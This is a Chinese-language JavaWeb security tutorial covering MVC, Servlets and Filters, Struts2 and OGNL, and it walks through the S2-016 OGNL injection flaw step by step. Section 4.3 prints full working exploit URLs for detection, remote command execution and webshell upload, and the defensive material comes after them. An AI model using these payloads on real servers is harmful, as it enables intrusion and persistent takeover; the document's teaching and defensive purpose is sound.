JavaWeb应用安全：MVC框架与Struts2漏洞详解<\/h1>

1. MVC框架基础<\/h2>

1.1 MVC概念与分层思想<\/h3>

MVC（Model-View-Controller）是一种将业务逻辑、数据与显示分离的设计模式：<\/p>

Model层<\/strong>：处理业务逻辑，通常用JavaBean或EJB实现<\/li>
View层<\/strong>：用户交互界面，可用JSP或其他技术实现<\/li>

Controller层<\/strong>：Model与View间的桥梁，处理用户请求并选择视图<\/li> <\/ul>
1.2 Model1与Model2对比<\/h3>
Model1特点<\/strong>：<\/p>

JSP处理所有客户端请求<\/li>
业务逻辑与显示高度耦合<\/li>
维护成本高，安全性差（SQL注入等漏洞常见）<\/li>
示例：http:\/\/localhost\/show_user.jsp?id=2<\/code><\/li> <\/ul> Model2特点<\/strong>：<\/p> 基于MVC模式（JSP+Servlet）<\/li> Servlet处理后端逻辑，JSP仅负责显示<\/li> 视图与业务逻辑分离<\/li> 示例：http:\/\/localhost\/ShowUserServlet?id=2<\/code><\/li> <\/ul> 2. JavaWeb核心组件<\/h2> 2.1 Servlet与Filter<\/h3> Servlet配置<\/strong>：<\/p> <servlet><\/span> <\/span><\/span> <servlet-name><\/span>LoginServlet<\/servlet-name><\/span> <\/span><\/span> <servlet-class><\/span>org.javaweb.servlet.LoginServlet<\/servlet-class><\/span> <\/span><\/span><\/servlet><\/span> <\/span><\/span><servlet-mapping><\/span> <\/span><\/span> <servlet-name><\/span>LoginServlet<\/servlet-name><\/span> <\/span><\/span> <url-pattern><\/span>\/servlet\/LoginServlet.action<\/url-pattern><\/span> <\/span><\/span><\/servlet-mapping><\/span> <\/span><\/span><\/code><\/pre>Filter配置<\/strong>：<\/p> <filter><\/span> <\/span><\/span> <filter-name><\/span>struts2<\/filter-name><\/span> <\/span><\/span> <filter-class><\/span>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter<\/filter-class><\/span> <\/span><\/span><\/filter><\/span> <\/span><\/span><filter-mapping><\/span> <\/span><\/span> <filter-name><\/span>struts2<\/filter-name><\/span> <\/span><\/span> <url-pattern><\/span>\/*<\/url-pattern><\/span> <\/span><\/span><\/filter-mapping><\/span> <\/span><\/span><\/code><\/pre>2.2 Filter接口方法<\/h3> public<\/span> void<\/span> init<\/span>(<\/span>FilterConfig filterConfig)<\/span> throws<\/span> ServletException;<\/span> <\/span><\/span>public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest request,<\/span> ServletResponse response,<\/span> FilterChain chain)<\/span> throws<\/span> IOException,<\/span> ServletException;<\/span> <\/span><\/span>public<\/span> void<\/span> destroy<\/span>();<\/span> <\/span><\/span><\/code><\/pre>3. Struts2框架深入<\/h2> 3.1 Struts2架构<\/h3> 请求处理流程<\/strong>：<\/p> 客户端请求到达Tomcat<\/li> 请求经过一系列过滤器<\/li> FilterDispatcher调用ActionMapper决定调用哪个Action<\/li> ActionProxy通过Configuration Manager查看struts.xml找到Action类<\/li> ActionInvocation回调Action的execute方法<\/li> 根据返回结果选择对应视图<\/li> <\/ol> 3.2 核心概念<\/h3> ActionContext<\/strong>：<\/p> 存放Action执行时需要的对象<\/li> 包含request、session、application等map属性<\/li> 获取方式：ActionContext ac = ActionContext.getContext();<\/code><\/li> <\/ul> ValueStack<\/strong>：<\/p> 存储Action对象引用的栈结构<\/li> 可通过OGNL表达式访问<\/li> <\/ul> OGNL（Object-Graph Navigation Language）<\/strong>：<\/p> Struts2默认表达式语言<\/li> 功能：访问对象方法和属性<\/li> 调用静态方法和属性<\/li> 操作集合对象<\/li> 支持赋值和表达式串联<\/li> <\/ul> <\/li> <\/ul> 3.3 OGNL表达式示例<\/h3> \/\/ 普通对象属性访问 <\/span><\/span><\/span><\/span>user.<\/span>name<\/span> <\/span><\/span> <\/span><\/span>\/\/ 静态方法调用 <\/span><\/span><\/span><\/span>@java.lang.Runtime@getRuntime<\/span>().<\/span>exec<\/span>(<\/span>'<\/span>command'<\/span>)<\/span> <\/span><\/span> <\/span><\/span>\/\/ Java等效代码 <\/span><\/span><\/span><\/span>java.<\/span>lang<\/span>.<\/span>Runtime<\/span>.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"command"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>4. Struts2漏洞分析<\/h2> 4.1 漏洞历史<\/h3> Struts2历史上主要漏洞编号：S2-001到S2-017，多数与OGNL表达式注入有关。<\/p> 4.2 S2-016漏洞分析<\/h3> 漏洞原理<\/strong>：<\/p> 不当处理action映射导致OGNL注入<\/li> 通过特殊参数（如redirect:、action:）执行恶意OGNL<\/li> <\/ul> 调试关键点<\/strong>：<\/p> 请求进入StrutsPrepareAndExecuteFilter.doFilter<\/code><\/li> 调用PrepareOperations.findActionMapping<\/code><\/li> DefaultActionMapper.handleSpecialParameters<\/code>处理恶意参数<\/li> 最终执行注入的OGNL表达式<\/li> <\/ol> 4.3 漏洞利用POC<\/h3> 检测POC<\/strong>：<\/p> http:\/\/target\/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman.getWriter().println(%22[\/ok]%22)')(d)) <\/code><\/pre> 命令执行POC<\/strong>：<\/p> http:\/\/target\/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43exec\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43is\75\43exec.getInputStream()')(d))&(i1)(('\43br\75new\40java.io.BufferedReader(new\40java.io.InputStreamReader(\43is))')(d))&(i2)(('\43res\75new\40char[50000]')(d))&(i3)(('\43br.read(\43res)')(d))&(i4)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i5)(('\43xman.getWriter().println(new\40java.lang.String(\43res))')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=ipconfig <\/code><\/pre> Webshell写入POC<\/strong>：<\/p> http:\/\/target\/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43fos\75new\40java.io.FileOutputStream(new\40java.lang.StringBuilder(\43req.getRealPath(%22\u005c%22)).append(@java.io.File@separator).append(%22shell.jsp%22).toString())')(d))&(i)(('\43fos.write(\43req.getParameter(%22p%22).getBytes())')(d))&(i4)(('\43fos.close()')(d))&p=<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> <\/code><\/pre> 5. 防御措施<\/h2> 5.1 防护层级<\/h3> CDN层<\/strong>：拦截所有Struts2请求过滤OGNL代码<\/li> Server层<\/strong>：在请求到达Struts2前拦截恶意请求<\/li> 项目层<\/strong>：在Struts2的Filter前添加拦截层<\/li> 框架层<\/strong>：使用Struts2拦截器拦截恶意请求<\/li> OGNL层<\/strong>：修改OGNL源码包拦截恶意表达式<\/li> 补丁方案<\/strong>：及时应用官方补丁<\/li> 替代方案<\/strong>：考虑迁移到Spring MVC等更安全框架<\/li> <\/ol> 5.2 具体防护方法<\/h3> 限制静态方法调用：<\/li> <\/ol> \/\/ struts.xml配置 <\/span><\/span><\/span><\/span><<\/span>constant name=<\/span>"struts.ognl.allowStaticMethodAccess"<\/span> value=<\/span>"false"<\/span>\/><\/span> <\/span><\/span><\/code><\/pre> 过滤特殊参数名：<\/li> <\/ol> redirect:<\/li> action:<\/li> redirectAction:<\/li> <\/ul> 输入验证与过滤：<\/li> <\/ol> \/\/ 自定义Filter过滤恶意OGNL表达式 <\/span><\/span><\/span><\/span>public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest request,<\/span> ServletResponse response,<\/span> FilterChain chain)<\/span> <\/span><\/span> throws<\/span> IOException,<\/span> ServletException {<\/span> <\/span><\/span> HttpServletRequest req =<\/span> (<\/span>HttpServletRequest)<\/span> request;<\/span> <\/span><\/span> Enumeration<<\/span>String><\/span> names =<\/span> req.<\/span>getParameterNames<\/span>();<\/span> <\/span><\/span> while<\/span>(<\/span>names.<\/span>hasMoreElements<\/span>())<\/span> {<\/span> <\/span><\/span> String name =<\/span> names.<\/span>nextElement<\/span>();<\/span> <\/span><\/span> if<\/span>(<\/span>name.<\/span>contains<\/span>(<\/span>"redirect:"<\/span>)<\/span> ||<\/span> name.<\/span>contains<\/span>(<\/span>"action:"<\/span>))<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> ServletException(<\/span>"Malicious parameter detected"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> chain.<\/span>doFilter<\/span>(<\/span>request,<\/span> response);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>6. 附录：关键知识点总结<\/h2> MVC分层<\/strong>：理解Model-View-Controller各层职责<\/li> OGNL表达式<\/strong>：掌握其语法和危险操作<\/li> Struts2流程<\/strong>：熟悉请求处理完整生命周期<\/li> 漏洞原理<\/strong>：理解参数注入导致OGNL执行的过程<\/li> 防护思路<\/strong>：多层次防御，从输入验证到架构替换<\/li> <\/ol> 通过深入理解这些知识点，可以有效提高JavaWeb应用的安全性，防范类似Struts2漏洞的攻击。<\/p>